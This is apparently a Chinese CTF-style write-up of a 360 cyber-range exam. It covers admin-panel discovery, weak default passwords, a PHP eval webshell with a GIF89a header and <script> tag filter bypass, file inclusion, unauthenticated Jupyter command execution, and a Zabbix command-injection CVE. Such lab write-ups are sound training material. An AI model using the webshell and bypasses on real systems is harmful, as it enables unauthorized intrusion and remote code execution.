記一次360靶場考核
第一輪理論題
百度搜答案即可= =
第二輪實戰考核
第一題 拆舊有限公司
打開環境是一個公司官網

隨便點了點沒發現什么東西
別慌
掃一下目錄,看看能不能掃到后台或者敏感路徑之類的突破口

果然,直接掃到了后台

嘗試了一下弱密碼admin/admin888成功登錄
發現是一個備份文件后台

通過抓包修改備份文件內容和文件名
這里嘗試上傳一句話

成功連接shell

第二題 圖書館公共網絡存儲網盤
打開環境是一個登錄頁面

發現它有一個”非注冊用戶上傳文件“的功能

經過測試發現檢測了文件頭,
所以這里用GIF89a來繞過文件頭檢測,
再次上傳一句話時,發現還過濾了<?,
決定用\<script\>標簽php一句話木馬來繞過<?的過濾。
<script language="php">
@eval($_POST['shell']);
</script>

但怎么都不解析PHP
沒有思路的時候,重新看了一遍上傳功能

!!!!!突然發現
URL中存在文件包含

成功拿下


第三題
上傳繞過方法與第二題一致就不過多敘述
第四題 WEB應用管理
jupyter的未授權訪問遠程命令執行
漏洞編號:SSV-99338
漏洞描述:管理員未為Jupyter Notebook配置密碼,將導致未授權訪問漏洞,游客可在其中創建一個console並執行任意Python代碼和命令。
執行系統命令


ovyan@1904042cf343:~$vyan@1904042cf343:~$ ls ../../
bin boot dev etc home KEY_10b6e8259961.txt lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
jovyan@1904042cf343:~$ cat /KEY_10b6e8259961.txt
mozhe7addd24523b82e0e371b5f7c7dg
第五題 智谷運維管理系統
漏洞編號:CVE-2020-11800
Zabbix Server的trapper命令處理,
存在命令注入漏洞,可導致遠程代碼執行。
弱口令登錄后台admin/Zabbix





拿下
附:

